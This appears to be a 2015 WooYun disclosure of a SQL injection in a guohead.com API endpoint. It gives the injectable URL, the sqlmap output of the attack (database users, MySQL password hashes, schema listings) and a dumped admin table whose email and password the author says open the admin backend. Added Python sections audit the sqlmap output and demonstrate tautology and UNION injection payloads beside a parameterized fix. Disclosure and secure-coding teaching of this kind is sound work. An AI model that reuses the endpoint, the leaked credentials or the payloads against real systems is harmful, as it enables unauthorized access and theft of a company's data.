
Vulnerability Summary

Defect ID: wooyun-2015-095162

Title: SQL injection on 果合网 (guohead.com) with root-privileged database access

Vendor: 果合网

Author: sky

Submitted: 2015-02-02 12:59

Fix deadline: 2015-03-19 13:00

Disclosed: 2015-03-19 13:00

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability Details

Disclosure timeline:

2015-02-02: Actively contacting the vendor and waiting for them to claim the report; details withheld from the public
2015-03-19: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection. Sloppy.

Details:

Injection point: http://api.mix.guohead.com/stats_app_activity.php?spid=a85a279e38364d17&client=1&gh_ver=2.0.5&app_pkg=com.ejiuwu.qpbuyu&app_ver=3.2.2&mac=020000000000&open_udid=8ec4d374f19ec87dfd632d448e6e30e42616c9f8&pmodel=iPhone7,2&wifi=1&adid=B494BDA4-C71A-44F9-A858-AC2891C230E4&is_ad_track_enabled=1&vendor_id=F469C05D-BC41-481B-ABB1-8B330ACB180B&width=568.000000&height=320.000000&os_lang=zh_CN&os_ver=8.1.2&jailbreak=1&app_dev_fml=1,2&a1=misd&a2=assertiond&a3=discoveryd&a4=fairplayd.H2&a5=cfprefsd&a6=seld&a7=discoveryd_helpe&a8=passd&a9=biometrickitd&a10=nfcd&a11=searchd&a12=nsurlsessiond&a13=InCallService&a14=bird&a15=MobileSMS&a16=ReportCrash&a17=cloudphotod&a18=cloudd&a19=coreduetd&a20=assistant_servic&a21=nsurlstoraged&a22=pkd&a23=QQ&a24=coreauthd&a25=DuetHeuristic-BM&a26=WirelessRadioMan&a27=awdd&a28=CoreAuthUI&a29=lsuseractivityd&a30=MicroMessenger&a31=rtcreportingd&a32=coresymbolicatio&a33=diagnosticd&a34=com.apple.sbd&a35=absd&a36=misagent&a37=pipelined&a38=IMDPersistenceAg&a39=CacheDeleteDaily&a40=com.apple.lakitu&a41=vvebo&a42=%C3%82%C3%A7%C3%89%C3%81%C3%87%C3%86%C3%8A%C3%A7%C3%AF%C3%88%C2%B1%C2%BA&a43=Preferences&a44=nehelper&a45=MobileSafari&a46=com.apple.WebKit&a47=com.apple.WebKit&a48=qpbuyu&a49=gamecontrollerd&a50=ReportCrash&a51=xpcproxy&initial=1
Also found an admin login page: http://www.guohead.com/admin/login

Proof:

Data extracted through the injection:

database management system users [7]:
[*] ''@'localhost'
[*] 'guohe'@'192.168.%'
[*] 'guohead'@'192.168.1.%'
[*] 'nagios'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
database management system users password hashes:
[*] [1]:
password hash: NULL
[*] guohe [1]:
password hash: *F0EF2DFB75DECAF7AF5A6FF3BCB9A892E1E01BEE
[*] guohead [1]:
password hash: *253F9D4A3524F18438FD5503DC57C02A48ABFFD0
[*] nagios [1]:
password hash: *7389421331C5A33D6D2E8C64E5150601291601DA
[*] root [1]:
password hash: NULL


Couldn't crack the passwords; otherwise I could have pushed further.
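A quick way to turn a listing like the one above into findings, added here as an example (not part of the report, and not sqlmap's own code): parse sqlmap's --users / --passwords text output and flag anonymous accounts, accounts allowed in from any host ('%'), accounts whose hash is NULL (no password appears to be set, which is the case for root and the anonymous user in the dump above), and mysql_native_password hashes. The sample input is constructed for this example with placeholder hosts and hash values laid out the way sqlmap prints them; it is not the dumped data. One caveat on "couldn't crack": a `*`-prefixed 40-hex MySQL hash is unsalted SHA1(SHA1(password)), so it holds up only as long as the password itself does, and an account with a NULL hash needs no cracking at all.

```python
import re

# Constructed sample in the layout sqlmap prints for --users / --passwords.
# Hosts and hash values are placeholders for this example, not the report's data.
SQLMAP_OUTPUT = """\
database management system users [5]:
[*] ''@'localhost'
[*] 'app'@'192.168.%'
[*] 'monitor'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
database management system users password hashes:
[*] [1]:
    password hash: NULL
[*] app [1]:
    password hash: *0123456789ABCDEF0123456789ABCDEF01234567
[*] monitor [1]:
    password hash: *89ABCDEF0123456789ABCDEF0123456789ABCDEF
[*] root [1]:
    password hash: NULL
"""

USER_RE = re.compile(r"^\[\*\] '([^']*)'@'([^']*)'$")
HASH_OWNER_RE = re.compile(r"^\[\*\] (\S*)\s*\[\d+\]:$")  # name is empty for the '' user
HASH_RE = re.compile(r"^password hash: (\S+)$")
NATIVE_HASH_RE = re.compile(r"^\*[0-9A-Fa-f]{40}$")        # mysql_native_password format


def parse_sqlmap_users(text):
    """Return ([(user, host), ...], {user: [hash, ...]}) from sqlmap's text output."""
    accounts, hashes, owner = [], {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = USER_RE.match(line)
        if m:
            accounts.append((m.group(1), m.group(2)))
            continue
        m = HASH_OWNER_RE.match(line)
        if m:
            owner = m.group(1)          # hashes that follow belong to this user
            continue
        m = HASH_RE.match(line)
        if m and owner is not None:
            hashes.setdefault(owner, []).append(m.group(1))
    return accounts, hashes


def audit_accounts(accounts, hashes):
    """Flag the account-hygiene problems visible in a mysql.user dump.

    Each finding is (kind, user, detail) so callers can filter by kind."""
    findings = []
    for user, host in accounts:
        if user == "":
            findings.append(("anonymous_account", user, host))
        if host == "%":
            findings.append(("any_host", user, host))
    for user, hs in hashes.items():
        for h in hs:
            if h == "NULL":
                findings.append(("empty_password", user, h))
            elif NATIVE_HASH_RE.match(h):
                # Unsalted SHA1(SHA1(pw)): offline cracking speed is bounded only
                # by password strength, so weak passwords here fall quickly.
                findings.append(("unsalted_sha1_hash", user, h))
    return findings


if __name__ == "__main__":
    acc, hs = parse_sqlmap_users(SQLMAP_OUTPUT)
    for finding in audit_accounts(acc, hs):
        print(finding)
```

Feed it the saved sqlmap output instead of the embedded sample to run it against a real engagement; the parser only relies on the `[*] 'user'@'host'`, `[*] user [n]:` and `password hash:` line shapes.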

available databases [9]:
[*] guohead
[*] guoheadold
[*] guohemix
[*] information_schema
[*] mix_bi
[*] mysql
[*] performance_schema
[*] test
[*] x_blog


Database: x_blog
[11 tables]
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
Database: x_blog
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| display_name        | varchar(250)        |
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_email          | varchar(100)        |
| user_login          | varchar(60)         |
| user_nicename       | varchar(50)         |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
+---------------------+---------------------+
admin_user.csv
root@kali:/usr/share/sqlmap/output/api.mix.guohead.com/dump/guohead# cat admin_user.csv
id,email,password,createTime
1,wozai_m_gh2@guohead.com,f130354a6535040a6983235}d538f3db,2010-12-06 06:29:20
2,wozai_m_gh3@guohead.com,guohe!wangxi@recool,2010-12-06 06:29:20


Database: guohemix
[88 tables]
+---------------------------------------+
| sysconfig                             |
| windo}s2marked                        |
| activity2aid                          |
| activity2obj                          |
| activity_ad                           |
| activity_apply                        |
| activity_recycle                      |
| admin_rechange_log                    |
| advertiser_ad                         |
| advertiser_info                       |
| android_xp_pop_setting                |
| app_category_mapping                  |
| app_heartbeat                         |
| app_parter                            |
| app_pay_detail_as                     |
| app_pay_detail_cm                     |
| apps                                  |
| apps_bak                              |
| apps_rank                             |
| apps_rank_cate                        |
| auto_mail                             |
| changelog                             |
| developer_api                         |
| device                                |
| dic_app_category                      |
| dic_campaign_order_rule               |
| dic_campaign_orpe                     |
| dic_multiwall_list_style              |
| dic_pay_type                          |
| fill_rate                             |
| friends                               |
| game_tag                              |
| game_tag_app_map                      |
| game_tag_category                     |
| last_action                           |
| market_circle_pool                    |
| member                                |
| member_findpwd                        |
| member_intval                         |
| member_pay_detail                     |
| member_payoff                         |
| member_payoff_detail                  |
| member_withdraw                       |
| member_withdraw_info                  |
| money_manger                          |
| multiwall_actiall_campaigns           |
| multiwall_active                      |
| multiwall_appwall_campaigns_archive   |
| multiwall_dev_income                  |
| multiwall_dev_income_archive          |
| multiwall_dev_income_percent          |
| multiwall_dev_income_percent_archive  |
| multiwall_integral_consume_ios        |
| multiwall_integral_detail_ios         |
| multiwall_integral_rate               |
| multiwall_integral_task               |
| multiwall_liject                      |
| multiwall_list                        |
| multiwall_offerwall_campaigns         |
| multiwall_offerwall_campaigns_archive |
| multiwall_offgin                      |
| multiwall_reward_delay                |
| multiwall_stats                       |
| multiwall_stats_plugin                |
| notice                                |
| pay_policy                            |
| pay_policy_archive                    |
| paylog_income                         |
| paylog_spread                         |
| payoff_poly                           |
| pm                                    |
| pm_list                               |
| pm_notice                             |
| quantity_poly                         |
| sdk_activity_app_setting              |
| stats                                 |
| stats_dau                             |
| stats_nosdk                           |
| sys_plugin                            |
| system_notice                         |
| trade_market                          |
| union_pool                            |
| union_status                          |
| white_paper                           |
| white_paper_list                      |
| win_object                            |
| win_plugin                            |
| win_plugin_type                       |
+---------------------------------------+


The account and password dumped above log straight into the admin backend.

[screenshot omitted: 7477828B-D642-4F52-85FB-633E460D2C00.png]


Suggested fix:

Filter the input.
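The report names neither the injectable parameter nor the server-side code, so the following Python is an added example, not code from guohead.com or from the original submission. It reconstructs the bug class against an in-memory SQLite database: a lookup that splices a request parameter into the SQL string (spid is used as the stand-in; which of the many parameters in the request above is actually injectable is not stated on the page), beside the same lookup written as a parameterized query. The app_activity and admin_user tables and their rows are constructed for the example and are placeholders, not the dumped data. The point the fix section understates: "filtering" (escaping or blacklisting characters) is fragile and easy to bypass, whereas binding the value as a parameter means the payload is never parsed as SQL, so both the tautology and the UNION dump below simply return nothing.

```python
import sqlite3

# Constructed sample rows standing in for the stats table behind
# stats_app_activity.php; the real schema is not shown in the report.
APP_ROWS = [
    ("a85a279e38364d17", "com.ejiuwu.qpbuyu", "3.2.2"),
    ("0123456789abcdef", "com.example.other", "1.0.0"),
]
# Stand-in for a credentials table like the dumped admin_user; placeholder values.
ADMIN_ROWS = [
    (1, "admin@example.invalid", "placeholder-password-hash"),
]


def make_db():
    """Build an in-memory database holding the constructed sample tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE app_activity (spid TEXT, app_pkg TEXT, app_ver TEXT)")
    conn.executemany("INSERT INTO app_activity VALUES (?, ?, ?)", APP_ROWS)
    conn.execute("CREATE TABLE admin_user (id INTEGER, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO admin_user VALUES (?, ?, ?)", ADMIN_ROWS)
    return conn


def lookup_vulnerable(conn, spid):
    """The bug class: the request parameter is spliced straight into the SQL text."""
    sql = "SELECT app_pkg, app_ver FROM app_activity WHERE spid = '%s'" % spid
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, spid):
    """The fix: the value is bound as a parameter and is never parsed as SQL."""
    sql = "SELECT app_pkg, app_ver FROM app_activity WHERE spid = ?"
    return conn.execute(sql, (spid,)).fetchall()


# Two classic payloads: a tautology (every row comes back) and a UNION that
# reads a different table, which is how a credentials table gets dumped.
TAUTOLOGY = "' OR '1'='1"
UNION_DUMP = "x' UNION SELECT email, password FROM admin_user--"


def demo():
    """Run both lookups against a legitimate value and both payloads."""
    conn = make_db()
    return {
        "legit_vuln": lookup_vulnerable(conn, "a85a279e38364d17"),
        "legit_fixed": lookup_fixed(conn, "a85a279e38364d17"),
        "tautology_vuln": lookup_vulnerable(conn, TAUTOLOGY),
        "tautology_fixed": lookup_fixed(conn, TAUTOLOGY),
        "union_vuln": lookup_vulnerable(conn, UNION_DUMP),
        "union_fixed": lookup_fixed(conn, UNION_DUMP),
    }


if __name__ == "__main__":
    for case, rows in demo().items():
        print(f"{case:16s} -> {rows}")
```

The same two functions map directly onto PHP: the vulnerable form is a string-built query handed to mysql_query(), the fixed form is a PDO prepared statement with bound parameters. Parameterization fixes this one endpoint; the database account the endpoint connects with still decides how much an injection elsewhere can reach, which is why an application user with only the privileges it needs, rather than root, belongs in the same fix.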

Copyright notice: when reposting, credit the source: sky@乌云


Vendor Response

Vendor reply:

The vendor could not be reached, or the vendor actively declined the report.